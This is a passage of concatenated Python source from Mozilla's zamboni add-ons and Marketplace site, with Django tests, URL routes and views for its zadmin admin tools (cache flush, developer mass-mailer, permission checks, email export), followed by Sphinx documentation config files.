        eq_(r.status_code, 200)
        file = File.objects.get(pk=67442)
        eq_(file.status, 2)

    @mock.patch.object(File, 'file_path',
                       amo.tests.AMOPaths().file_fixture_path(
                           'delicious_bookmarks-2.1.106-fx.xpi'))
    def test_regenerate_hash(self):
        version = Version.objects.create(addon_id=3615)
        file = File.objects.create(
            filename='delicious_bookmarks-2.1.106-fx.xpi', version=version)
        r = self.client.post(reverse('zadmin.recalc_hash', args=[file.id]))
        eq_(json.loads(r.content)[u'success'], 1)
        # Re-fetch to see the recalculated size/hash.
        file = File.objects.get(pk=file.id)
        assert file.size, 'File size should not be zero'
        assert file.hash, 'File hash should not be empty'

    @mock.patch.object(File, 'file_path',
                       amo.tests.AMOPaths().file_fixture_path(
                           'delicious_bookmarks-2.1.106-fx.xpi'))
    def test_regenerate_hash_get(self):
        """ Don't allow GET """
        version = Version.objects.create(addon_id=3615)
        file = File.objects.create(
            filename='delicious_bookmarks-2.1.106-fx.xpi', version=version)
        r = self.client.get(reverse('zadmin.recalc_hash', args=[file.id]))
        eq_(r.status_code, 405)  # GET out of here
class TestMemcache(amo.tests.TestCase):
    """The zadmin cache-flush view."""
    fixtures = ['base/addon_3615', 'base/users']

    def setUp(self):
        self.url = reverse('zadmin.memcache')
        cache.set('foo', 'bar')
        self.client.login(username='admin@mozilla.com', password='password')

    def test_login(self):
        self.client.logout()
        eq_(self.client.get(self.url).status_code, 302)

    def test_can_clear(self):
        self.client.post(self.url, {'yes': 'True'})
        eq_(cache.get('foo'), None)

    def test_cant_clear(self):
        # Without explicit confirmation the cache is left untouched.
        self.client.post(self.url, {'yes': 'False'})
        eq_(cache.get('foo'), 'bar')
class TestElastic(amo.tests.ESTestCase):
    """The zadmin ElasticSearch status page requires login."""
    fixtures = ['base/addon_3615', 'base/users']

    def setUp(self):
        self.url = reverse('zadmin.elastic')
        self.client.login(username='admin@mozilla.com', password='password')

    def test_login(self):
        self.client.logout()
        self.assertRedirects(self.client.get(self.url),
            reverse('users.login') + '?to=/en-US/admin/elastic')
class TestEmailDevs(amo.tests.TestCase):
    """End-to-end tests for the zadmin.email_devs recipient filtering."""
    fixtures = ['base/addon_3615', 'base/users']

    def setUp(self):
        self.login('admin')
        self.addon = Addon.objects.get(pk=3615)

    def post(self, recipients='eula', subject='subject', message='msg',
             preview_only=False):
        # Helper: submit the email-devs form; defaults to the 'eula' group.
        return self.client.post(reverse('zadmin.email_devs'),
                                dict(recipients=recipients, subject=subject,
                                     message=message,
                                     preview_only=preview_only))

    def test_preview(self):
        # Preview mode records the recipients but sends no mail.
        res = self.post(preview_only=True)
        self.assertNoFormErrors(res)
        preview = EmailPreviewTopic(topic='email-devs')
        eq_([e.recipient_list for e in preview.filter()], ['[email protected]'])
        eq_(len(mail.outbox), 0)

    def test_actual(self):
        # A real send delivers exactly one message with the given content.
        subject = 'about eulas'
        message = 'message about eulas'
        res = self.post(subject=subject, message=message)
        self.assertNoFormErrors(res)
        self.assertRedirects(res, reverse('zadmin.email_devs'))
        eq_(len(mail.outbox), 1)
        eq_(mail.outbox[0].subject, subject)
        eq_(mail.outbox[0].body, message)
        eq_(mail.outbox[0].to, ['[email protected]'])
        eq_(mail.outbox[0].from_email, settings.DEFAULT_FROM_EMAIL)

    def test_only_eulas(self):
        # Removing the EULA drops the add-on from the 'eula' group.
        self.addon.update(eula=None)
        res = self.post()
        self.assertNoFormErrors(res)
        eq_(len(mail.outbox), 0)

    def test_only_apps_with_payments(self):
        # Premium webapps are included even while pending, but never when
        # deleted.
        self.addon.update(type=amo.ADDON_WEBAPP,
                          premium_type=amo.ADDON_PREMIUM)
        res = self.post(recipients='payments')
        self.assertNoFormErrors(res)
        eq_(len(mail.outbox), 1)

        mail.outbox = []
        self.addon.update(status=amo.STATUS_PENDING)
        res = self.post(recipients='payments')
        self.assertNoFormErrors(res)
        eq_(len(mail.outbox), 1)

        mail.outbox = []
        self.addon.update(status=amo.STATUS_DELETED)
        res = self.post(recipients='payments')
        self.assertNoFormErrors(res)
        eq_(len(mail.outbox), 0)

    def test_only_free_apps_with_new_regions(self):
        # enable_new_regions switches an app between the enabled/disabled
        # free-app recipient groups.
        self.addon.update(type=amo.ADDON_WEBAPP)
        res = self.post(recipients='free_apps_region_enabled')
        self.assertNoFormErrors(res)
        eq_(len(mail.outbox), 0)
        mail.outbox = []
        res = self.post(recipients='free_apps_region_disabled')
        self.assertNoFormErrors(res)
        eq_(len(mail.outbox), 1)

        mail.outbox = []
        self.addon.update(enable_new_regions=True)
        res = self.post(recipients='free_apps_region_enabled')
        self.assertNoFormErrors(res)
        eq_(len(mail.outbox), 1)
        mail.outbox = []
        res = self.post(recipients='free_apps_region_disabled')
        self.assertNoFormErrors(res)
        eq_(len(mail.outbox), 0)

    def test_only_apps_with_payments_and_new_regions(self):
        # Same region split, restricted to premium apps.
        self.addon.update(type=amo.ADDON_WEBAPP,
                          premium_type=amo.ADDON_PREMIUM)
        res = self.post(recipients='payments_region_enabled')
        self.assertNoFormErrors(res)
        eq_(len(mail.outbox), 0)
        mail.outbox = []
        res = self.post(recipients='payments_region_disabled')
        self.assertNoFormErrors(res)
        eq_(len(mail.outbox), 1)

        mail.outbox = []
        self.addon.update(enable_new_regions=True)
        res = self.post(recipients='payments_region_enabled')
        self.assertNoFormErrors(res)
        eq_(len(mail.outbox), 1)
        mail.outbox = []
        res = self.post(recipients='payments_region_disabled')
        self.assertNoFormErrors(res)
        eq_(len(mail.outbox), 0)

    def test_only_desktop_apps(self):
        # Only apps with a desktop device type are in 'desktop_apps'.
        from addons.models import AddonDeviceType
        self.addon.update(type=amo.ADDON_WEBAPP)
        AddonDeviceType.objects.create(addon=self.addon,
                                       device_type=amo.DEVICE_MOBILE.id)
        res = self.post(recipients='desktop_apps')
        self.assertNoFormErrors(res)
        eq_(len(mail.outbox), 0)

        mail.outbox = []
        AddonDeviceType.objects.create(addon=self.addon,
                                       device_type=amo.DEVICE_DESKTOP.id)
        res = self.post(recipients='desktop_apps')
        self.assertNoFormErrors(res)
        eq_(len(mail.outbox), 1)

        mail.outbox = []
        self.addon.update(status=amo.STATUS_PENDING)
        res = self.post(recipients='desktop_apps')
        self.assertNoFormErrors(res)
        eq_(len(mail.outbox), 1)

        mail.outbox = []
        self.addon.update(status=amo.STATUS_DELETED)
        res = self.post(recipients='desktop_apps')
        self.assertNoFormErrors(res)
        eq_(len(mail.outbox), 0)

    def test_only_apps(self):
        self.addon.update(type=amo.ADDON_WEBAPP)
        res = self.post(recipients='apps')
        self.assertNoFormErrors(res)
        eq_(len(mail.outbox), 1)

    def test_only_extensions(self):
        self.addon.update(type=amo.ADDON_EXTENSION)
        res = self.post(recipients='all_extensions')
        self.assertNoFormErrors(res)
        eq_(len(mail.outbox), 1)

    def test_ignore_deleted_always(self):
        # Deleted add-ons must never be emailed, whatever the group.
        self.addon.update(status=amo.STATUS_DELETED)
        for name, label in DevMailerForm._choices:
            res = self.post(recipients=name)
            self.assertNoFormErrors(res)
            eq_(len(mail.outbox), 0)

    def test_exclude_pending_for_addons(self):
        # Pending add-ons are excluded except for the app-specific groups.
        self.addon.update(status=amo.STATUS_PENDING)
        for name, label in DevMailerForm._choices:
            if name in ('payments', 'desktop_apps'):
                continue
            res = self.post(recipients=name)
            self.assertNoFormErrors(res)
            eq_(len(mail.outbox), 0)
class TestPerms(amo.tests.TestCase):
    """Check which admin pages each permission group may reach."""
    fixtures = ['base/users', 'base/apps']

    def test_admin_user(self):
        # Admin should see views with Django's perm decorator and our own.
        assert self.client.login(username='[email protected]',
                                 password='password')
        eq_(self.client.get(reverse('zadmin.index')).status_code, 200)
        eq_(self.client.get(reverse('zadmin.settings')).status_code, 200)
        eq_(self.client.get(reverse('zadmin.addon-search')).status_code, 200)

    def test_staff_user(self):
        # Staff users have some privileges.
        user = UserProfile.objects.get(email='[email protected]')
        group = Group.objects.create(name='Staff', rules='AdminTools:View')
        GroupUser.objects.create(group=group, user=user)
        assert self.client.login(username='[email protected]',
                                 password='password')
        eq_(self.client.get(reverse('zadmin.index')).status_code, 200)
        eq_(self.client.get(reverse('zadmin.settings')).status_code, 200)
        eq_(self.client.get(reverse('zadmin.addon-search')).status_code, 200)

    def test_sr_reviewers_user(self):
        # Sr Reviewers users have only a few privileges.
        user = UserProfile.objects.get(email='[email protected]')
        group = Group.objects.create(name='Sr Reviewer',
                                     rules='ReviewerAdminTools:View')
        GroupUser.objects.create(group=group, user=user)
        assert self.client.login(username='[email protected]',
                                 password='password')
        eq_(self.client.get(reverse('zadmin.index')).status_code, 200)
        eq_(self.client.get(reverse('zadmin.addon-search')).status_code, 200)
        eq_(self.client.get(reverse('zadmin.settings')).status_code, 403)

    def test_bulk_compat_user(self):
        # Bulk Compatibility Updaters only have access to /admin/validation/*.
        user = UserProfile.objects.get(email='[email protected]')
        group = Group.objects.create(name='Bulk Compatibility Updaters',
                                     rules='BulkValidationAdminTools:View')
        GroupUser.objects.create(group=group, user=user)
        assert self.client.login(username='[email protected]',
                                 password='password')
        eq_(self.client.get(reverse('zadmin.index')).status_code, 200)
        eq_(self.client.get(reverse('zadmin.addon-search')).status_code, 403)
        eq_(self.client.get(reverse('zadmin.settings')).status_code, 403)

    def test_unprivileged_user(self):
        # Unprivileged user.
        assert self.client.login(username='[email protected]',
                                 password='password')
        eq_(self.client.get(reverse('zadmin.index')).status_code, 403)
        eq_(self.client.get(reverse('zadmin.settings')).status_code, 403)
        eq_(self.client.get(reverse('zadmin.addon-search')).status_code, 403)
        # Anonymous users should also get a 403.
        self.client.logout()
        self.assertRedirects(self.client.get(reverse('zadmin.index')),
                             reverse('users.login') + '?to=/en-US/admin/')
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from django.contrib import admin
from django.core.exceptions import PermissionDenied
from django.shortcuts import redirect
from addons.urls import ADDON_ID
from amo.urlresolvers import reverse
from . import views
# URL routes for the zadmin app: custom admin pages first, then the stock
# Django admin mounted under /models/.
urlpatterns = patterns('',
    # AMO stuff.
    url('^$', views.index, name='zadmin.index'),
    url('^models$', lambda r: redirect('admin:index'), name='zadmin.home'),
    url('^addon/manage/%s/$' % ADDON_ID,
        views.addon_manage, name='zadmin.addon_manage'),
    url('^addon/recalc-hash/(?P<file_id>\d+)/', views.recalc_hash,
        name='zadmin.recalc_hash'),
    url('^env$', views.env, name='amo.env'),
    url('^hera', views.hera, name='zadmin.hera'),
    url('^memcache$', views.memcache, name='zadmin.memcache'),
    url('^settings', views.show_settings, name='zadmin.settings'),
    url('^fix-disabled', views.fix_disabled_file, name='zadmin.fix-disabled'),
    url(r'^email_preview/(?P<topic>.*)\.csv$',
        views.email_preview_csv, name='zadmin.email_preview_csv'),
    url('^mail$', views.mail, name='zadmin.mail'),
    url('^email-devs$', views.email_devs, name='zadmin.email_devs'),
    url('^generate-error$', views.generate_error,
        name='zadmin.generate-error'),
    url('^export_email_addresses$', views.export_email_addresses,
        name='zadmin.export_email_addresses'),
    url('^email_addresses_file$', views.email_addresses_file,
        name='zadmin.email_addresses_file'),
    url('^price-tiers$', views.price_tiers, name='zadmin.price_tiers'),

    # The Django admin.
    url('^models/', include(admin.site.urls)),
    url('^models/(?P<app_id>.+)/(?P<model_id>.+)/search.json$',
        views.general_search, name='zadmin.search'),
)
# Hijack the admin's login to use our pages.
def login(request):
    """Replace the Django admin login with a redirect to our own login.

    An authenticated user who lands here lacks permission for the page
    they requested, so raise PermissionDenied instead of re-prompting.
    """
    if request.user.is_authenticated():
        raise PermissionDenied
    return redirect('%s?to=%s' % (reverse('users.login'), request.path))


admin.site.login = login
########NEW FILE########
__FILENAME__ = views
import csv
from urlparse import urlparse
from django import http
from django.conf import settings
from django.contrib import admin
from django.core.cache import cache
from django.core.exceptions import PermissionDenied
from django.core.files.storage import default_storage as storage
from django.db.models.loading import cache as app_cache
from django.shortcuts import get_object_or_404, redirect, render
from django.views import debug
from django.views.decorators.cache import never_cache
import commonware.log
import jinja2
from hera.contrib.django_forms import FlushForm
from hera.contrib.django_utils import flush_urls, get_hera
import amo
from addons.decorators import addon_view
from addons.models import AddonUser
from amo import messages
from amo.decorators import any_permission_required, json_view, post_required
from amo.mail import FakeEmailBackend
from amo.urlresolvers import reverse
from amo.utils import chunked
from devhub.models import ActivityLog
from files.models import File
from users.models import UserProfile
from zadmin.forms import GenerateErrorForm, PriceTiersForm
from . import tasks
from .decorators import admin_required
from .forms import AddonStatusForm, DevMailerForm, FileFormSet, YesImSure
from .models import EmailPreviewTopic
from mkt.prices.utils import update_from_csv
log = commonware.log.getLogger('z.zadmin')
@admin.site.admin_view
def hera(request):
    """Show Hera (front-end cache) stats and let admins flush URL lists."""
    form = FlushForm(initial={'flushprefix': settings.SITE_URL})

    boxes = []
    configured = False  # Default to not showing the form.

    for i in settings.HERA:
        hera = get_hera(i)
        r = {'location': urlparse(i['LOCATION'])[1], 'stats': False}
        if hera:
            r['stats'] = hera.getGlobalCacheInfo()
            configured = True
        boxes.append(r)

    if not configured:
        messages.error(request, "Hera is not (or mis-)configured.")
        form = None

    # NOTE(review): `hera` below is the loop variable left over from the
    # last iteration above; if settings.HERA is empty this raises NameError,
    # and otherwise only the *last* box gates the POST branch — confirm
    # this is intended.
    if request.method == 'POST' and hera:
        form = FlushForm(request.POST)
        if form.is_valid():
            expressions = request.POST['flushlist'].splitlines()

            for url in expressions:
                num = flush_urls([url], request.POST['flushprefix'], True)
                msg = ("Flushed %d objects from front end cache for: %s"
                       % (len(num), url))
                log.info("[Hera] (user:%s) %s" % (request.user, msg))
                messages.success(request, msg)

    return render(request, 'zadmin/hera.html', {'form': form, 'boxes': boxes})
@admin_required
def show_settings(request):
    """Render a cleansed dump of the Django settings for admins."""
    settings_dict = debug.get_safe_settings()

    # HERA entries carry credentials, so cleanse each one individually.
    settings_dict['HERA'] = [debug.cleanse_setting('HERA', entry)
                             for entry in settings.HERA]

    for name in ['GOOGLE_ANALYTICS_CREDENTIALS']:
        settings_dict[name] = debug.cleanse_setting(
            name, getattr(settings, name, {}))

    # Never show the receipt signing key, even cleansed.
    settings_dict['WEBAPPS_RECEIPT_KEY'] = '********************'

    return render(request, 'zadmin/settings.html',
                  {'settings_dict': settings_dict})
@admin_required
def env(request):
    """Dump the request object, HTML-escaped, for quick debugging."""
    escaped = jinja2.escape(request)
    return http.HttpResponse(u'<pre>%s</pre>' % escaped)
@admin.site.admin_view
def fix_disabled_file(request):
    """Look up a File by id and, once confirmed, unhide its disabled file."""
    found = None
    if request.method == 'POST' and 'file' in request.POST:
        found = get_object_or_404(File, id=request.POST['file'])
        if 'confirm' in request.POST:
            found.unhide_disabled_file()
            messages.success(request, 'We have done a great thing.')
            return redirect('zadmin.fix-disabled')
    return render(request, 'zadmin/fix-disabled.html',
                  {'file': found, 'file_id': request.POST.get('file', '')})
@any_permission_required([('Admin', '%'),
                          ('BulkValidationAdminTools', 'View')])
def email_preview_csv(request, topic):
    """Stream the previewed emails for ``topic`` as a CSV attachment."""
    fields = ['from_email', 'recipient_list', 'subject', 'body']

    resp = http.HttpResponse()
    resp['Content-Type'] = 'text/csv; charset=utf-8'
    resp['Content-Disposition'] = "attachment; filename=%s.csv" % (topic)

    writer = csv.writer(resp)
    writer.writerow(fields)
    for row in EmailPreviewTopic(topic=topic).filter().values_list(*fields):
        writer.writerow([value.encode('utf8') for value in row])
    return resp
@admin.site.admin_view
def mail(request):
    """Show mail captured by the fake email backend; a POST clears it."""
    backend = FakeEmailBackend()
    if request.method == 'POST':
        backend.clear()
        return redirect('zadmin.mail')
    context = dict(mail=backend.view_all())
    return render(request, 'zadmin/mail.html', context)
@admin.site.admin_view
def email_devs(request):
    """Queue an email to a selected group of add-on/app developers.

    The recipient group comes from DevMailerForm; each group maps to a
    queryset filter below.  In preview mode the messages are only recorded
    under the 'email-devs' preview topic instead of being sent.
    """
    form = DevMailerForm(request.POST or None)
    preview = EmailPreviewTopic(topic='email-devs')
    if preview.filter().count():
        preview_csv = reverse('zadmin.email_preview_csv',
                              args=[preview.topic])
    else:
        preview_csv = None
    if request.method == 'POST' and form.is_valid():
        data = form.cleaned_data
        # Start from every developer/owner with a known email address.
        qs = (AddonUser.objects.filter(role__in=(amo.AUTHOR_ROLE_DEV,
                                                 amo.AUTHOR_ROLE_OWNER))
                               .exclude(user__email=None))
        # App-centric groups keep pending apps but never deleted ones;
        # everything else is restricted to listed statuses.
        if data['recipients'] in ('payments', 'desktop_apps'):
            qs = qs.exclude(addon__status=amo.STATUS_DELETED)
        else:
            qs = qs.filter(addon__status__in=amo.LISTED_STATUSES)
        if data['recipients'] == 'eula':
            qs = qs.exclude(addon__eula=None)
        elif data['recipients'] in ('payments',
                                    'payments_region_enabled',
                                    'payments_region_disabled'):
            # Premium webapps, optionally split by enable_new_regions.
            qs = qs.filter(addon__type=amo.ADDON_WEBAPP)
            qs = qs.exclude(addon__premium_type__in=(amo.ADDON_FREE,
                                                     amo.ADDON_OTHER_INAPP))
            if data['recipients'] == 'payments_region_enabled':
                qs = qs.filter(addon__enable_new_regions=True)
            elif data['recipients'] == 'payments_region_disabled':
                qs = qs.filter(addon__enable_new_regions=False)
        elif data['recipients'] in ('apps', 'free_apps_region_enabled',
                                    'free_apps_region_disabled'):
            # All webapps, optionally split by enable_new_regions.
            qs = qs.filter(addon__type=amo.ADDON_WEBAPP)
            if data['recipients'] == 'free_apps_region_enabled':
                qs = qs.filter(addon__enable_new_regions=True)
            elif data['recipients'] == 'free_apps_region_disabled':
                qs = qs.filter(addon__enable_new_regions=False)
        elif data['recipients'] == 'desktop_apps':
            qs = (qs.filter(
                addon__type=amo.ADDON_WEBAPP,
                addon__addondevicetype__device_type=amo.DEVICE_DESKTOP.id))
        elif data['recipients'] == 'all_extensions':
            qs = qs.filter(addon__type=amo.ADDON_EXTENSION)
        else:
            raise NotImplementedError('If you want to support emailing other '
                                      'types of developers, do it here!')
        if data['preview_only']:
            # Clear out the last batch of previewed emails.
            preview.filter().delete()
        total = 0
        # De-dupe addresses and fan the send out in batches of 100.
        for emails in chunked(set(qs.values_list('user__email', flat=True)),
                              100):
            total += len(emails)
            tasks.admin_email.delay(emails, data['subject'], data['message'],
                                    preview_only=data['preview_only'],
                                    preview_topic=preview.topic)
        msg = 'Emails queued for delivery: %s' % total
        if data['preview_only']:
            msg = '%s (for preview only, emails not sent!)' % msg
        messages.success(request, msg)
        return redirect('zadmin.email_devs')
    return render(request, 'zadmin/email-devs.html',
                  dict(form=form, preview_csv=preview_csv))
@any_permission_required([('Admin', '%'),
                          ('AdminTools', 'View'),
                          ('ReviewerAdminTools', 'View'),
                          ('BulkValidationAdminTools', 'View')])
def index(request):
    """Admin landing page: show the five most recent admin activity events."""
    # Named `events` (was `log`) to avoid shadowing the module-level logger.
    events = ActivityLog.objects.admin_events()[:5]
    return render(request, 'zadmin/index.html', {'log': events})
@never_cache
@json_view
def general_search(request, app_id, model_id):
    """JSON autocomplete endpoint backed by the admin's search_fields.

    Returns up to 10 {'value': pk, 'label': text} rows for the model named
    by (app_id, model_id); 404s for unknown models and PermissionDenied for
    non-admin users.
    """
    if not admin.site.has_permission(request):
        raise PermissionDenied
    model = app_cache.get_model(app_id, model_id)
    if not model:
        raise http.Http404
    limit = 10
    # Private registry access: maps model class -> its ModelAdmin instance.
    obj = admin.site._registry[model]
    ChangeList = obj.get_changelist(request)
    # This is a hideous api, but uses the builtin admin search_fields API.
    # Expecting this to get replaced by ES so soon, that I'm not going to lose
    # too much sleep about it.
    cl = ChangeList(request, obj.model, [], [], [], [], obj.search_fields, [],
                    obj.list_max_show_all, limit, [], obj)
    qs = cl.get_query_set(request)
    # Override search_fields_response on the ModelAdmin object
    # if you'd like to pass something else back to the front end.
    lookup = getattr(obj, 'search_fields_response', None)
    return [{'value': o.pk, 'label': getattr(o, lookup) if lookup else str(o)}
            for o in qs[:limit]]
@admin_required(reviewers=True)
@addon_view
def addon_manage(request, addon):
    """Admin page to tweak an add-on's statuses and its files' statuses.

    Renders the addon-level AddonStatusForm plus a FileFormSet over every
    file of the currently paginated versions.  On a valid POST, logs and
    saves each changed status and redirects back here.
    """
    form = AddonStatusForm(request.POST or None, instance=addon)
    pager = amo.utils.paginate(request, addon.versions.all(), 30)
    # A list coercion so this doesn't result in a subquery with a LIMIT which
    # MySQL doesn't support (at this time).
    versions = list(pager.object_list)
    files = File.objects.filter(version__in=versions).select_related('version')
    formset = FileFormSet(request.POST or None, queryset=files)
    if form.is_valid() and formset.is_valid():
        if 'status' in form.changed_data:
            amo.log(amo.LOG.CHANGE_STATUS, addon, form.cleaned_data['status'])
            log.info('Addon "%s" status changed to: %s' % (
                addon.slug, form.cleaned_data['status']))
            form.save()

        if 'highest_status' in form.changed_data:
            log.info('Addon "%s" highest status changed to: %s' % (
                addon.slug, form.cleaned_data['highest_status']))
            form.save()

        if 'outstanding' in form.changed_data:
            log.info('Addon "%s" changed to%s outstanding' % (addon.slug,
                     '' if form.cleaned_data['outstanding'] else ' not'))
            form.save()

        # Distinct loop variable: the original rebound `form` here, silently
        # clobbering the addon-level form bound above.
        for file_form in formset:
            if 'status' in file_form.changed_data:
                log.info('Addon "%s" file (ID:%d) status changed to: %s' % (
                    addon.slug, file_form.instance.id,
                    file_form.cleaned_data['status']))
                file_form.save()
        return redirect('zadmin.addon_manage', addon.slug)

    # Build a map from file.id to form in formset for precise form display.
    form_map = dict((f.instance.id, f) for f in formset.forms)
    # A version to file map to avoid an extra query in the template.
    file_map = {}
    for file in files:
        file_map.setdefault(file.version_id, []).append(file)
    return render(request, 'zadmin/addon_manage.html', {
        'addon': addon, 'pager': pager, 'versions': versions, 'form': form,
        'formset': formset, 'form_map': form_map, 'file_map': file_map})
@admin.site.admin_view
@post_required
@json_view
def recalc_hash(request, file_id):
    """Recompute and persist a File's size and hash; returns JSON success."""
    file_obj = get_object_or_404(File, pk=file_id)
    file_obj.size = storage.size(file_obj.file_path)
    file_obj.hash = file_obj.generate_hash()
    file_obj.save()

    log.info('Recalculated hash for file ID %d' % file_obj.id)
    messages.success(request,
                     'File hash and size recalculated for file %d.'
                     % file_obj.id)
    return {'success': 1}
@admin.site.admin_view
def memcache(request):
    """Show memcache stats and offer a confirm-protected cache flush."""
    form = YesImSure(request.POST or None)
    if form.is_valid() and form.cleaned_data['yes']:
        cache.clear()
        form = YesImSure()
        messages.success(request, 'Cache cleared')

    # NOTE(review): relies on the private `_cache` attribute of the cache
    # backend; only memcached-style backends expose get_stats().
    stats = []
    if cache._cache and hasattr(cache._cache, 'get_stats'):
        stats = cache._cache.get_stats()
    return render(request, 'zadmin/memcache.html',
                  {'form': form, 'stats': stats})
@admin_required
def generate_error(request):
    """Deliberately raise a form-selected error to exercise error logging."""
    form = GenerateErrorForm(request.POST or None)
    submitted = request.method == 'POST'
    if submitted and form.is_valid():
        form.explode()
    return render(request, 'zadmin/generate-error.html', {'form': form})
@any_permission_required([('Admin', '%'),
                          ('MailingLists', 'View')])
def export_email_addresses(request):
    # Simple page with a button linking to the email-addresses download.
    return render(request, 'zadmin/export_button.html', {})
@any_permission_required([('Admin', '%'),
                          ('MailingLists', 'View')])
def email_addresses_file(request):
    """Download, as a text attachment, the opted-in users' email addresses."""
    resp = http.HttpResponse()
    resp['Content-Type'] = 'text/plain; charset=utf-8'
    resp['Content-Disposition'] = ('attachment; '
                                   'filename=amo_optin_emails.txt')
    emails = (UserProfile.objects.filter(notifications__notification_id=13,
                                         notifications__enabled=1)
              .values_list('email', flat=True))
    for address in emails:
        if address is None:
            continue
        resp.write(address + '\n')
    return resp
@admin_required
def price_tiers(request):
    """Upload a CSV of price tiers and apply it via update_from_csv."""
    output = []
    # `request.FILES or None` keeps the form unbound on GET: request.FILES
    # is an (empty) MultiValueDict, and passing it directly would bind the
    # form and surface spurious validation errors before any submit.
    form = PriceTiersForm(request.POST or None, request.FILES or None)
    if request.method == 'POST' and form.is_valid():
        output = update_from_csv(form.cleaned_data['prices'])
    return render(request, 'zadmin/update-prices.html',
                  {'result': output, 'form': form})
########NEW FILE########
__FILENAME__ = settings
from lib.settings_base import *
ROOT_URLCONF = 'default.urls'
########NEW FILE########
__FILENAME__ = urls
from lib.urls_base import *
########NEW FILE########
__FILENAME__ = conf
import sys
import os
# Make the repository root importable so we can reuse the main docs config.
sys.path.append(os.path.abspath('../..'))

from docs.conf import *  # noqa

project = u'API v1'
version = release = '1.0'  # Should correspond to the API version number

# The API docs don't cross-link to other projects.
intersphinx_mapping = {}
########NEW FILE########
__FILENAME__ = conf
# -*- coding: utf-8 -*-
#
# zamboni documentation build configuration file, created by
# sphinx-quickstart on Thu Oct 22 20:39:35 2009.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.abspath('.'))
sys.path.append(os.path.abspath('..'))
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest',
'sphinx.ext.intersphinx', 'sphinx.ext.todo',
'sphinx.ext.coverage', 'extensions.src_role',
'sphinxcontrib.httpdomain']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'zamboni'
copyright = u'2013, The Marketplace API Crew'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.8'
# The full version, including alpha/beta/rc tags.
release = '0.8'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
#html_theme_path = ['_themes']
#html_theme = 'mozilla'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'zambonidoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'zamboni.tex', u'zamboni Documentation',
u'Jeff Balogh', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# Intersphinx links to the local _intersphinx cache.
intersphinx_mapping = {
    'http://docs.python.org/': 'python.inv',
    'http://docs.djangoproject.com/en/dev': 'django.inv',
    'http://jinja.pocoo.org/2/documentation/': 'jinja.inv',
    # NOTE(review): sphinx maps to jinja.inv — looks like a copy/paste
    # leftover; confirm whether a sphinx.inv cache exists before changing.
    'http://sphinx.pocoo.org/': 'jinja.inv',
    'http://somethingaboutorange.com/mrl/projects/nose/0.11.1/': 'nose.inv',
}
# Point every entry at the checked-in _intersphinx cache.  Rebuilding the
